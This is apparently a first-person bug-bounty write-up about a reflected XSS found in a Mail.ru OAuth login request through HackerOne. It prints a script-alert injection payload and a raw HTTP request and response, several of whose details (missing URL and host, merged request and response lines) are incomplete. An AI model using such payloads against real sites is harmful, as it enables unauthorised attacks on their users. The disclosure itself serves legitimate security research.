Reflected XSS on a Public Program

Hi all, My name is Naveen J AKA thevillagehacker and this is my very first write-up and I thought I should contribute some resources to the community.


I chose my target as from mailru which had a large scope on HackerOne. After an hour of recon, I found an unintended behavior in the Oauth request so I decided to play around.

Technical Analysis

I added an extra parameter at the end of the keyed value on the request as below,

&Set-Cookie: <script>alert(“Hacked By Deathstroke”)</script>

The finally crafted URL will be like as below, <script>alert("Hacked By Deathstroke")</script>

After inserted the payload at the end of the URL sent the request as below and observed the response.


GET /oauth2/login/? <script>alert("Hacked By Deathstroke")</script> HTTP/1.1 Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close


<script>alert("Hacked By Deathstroke")</script> HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 
X-Frame-Options: SAMEORIGIN
Content-Length: 3982
Vary: Origin

But unfortunately, no access token is reflected on the response at the time. But I reported to the program because the issue may cause some other security threats.

Proof Of Concept

Seems that the payload worked which is reflected on the HTTP response.

It was my first Vulnerability that I found, so I quickly created a report and sent it to HackerOne. The HackerOne analyst verified the vulnerability and triaged the report after some discussions and the issue was resolved and they rewarded me a HOF.

Thanks for Reading …

Follow me on Twitter : thevillagehacker

Security Researcher | Security Engineer | Security Nerd…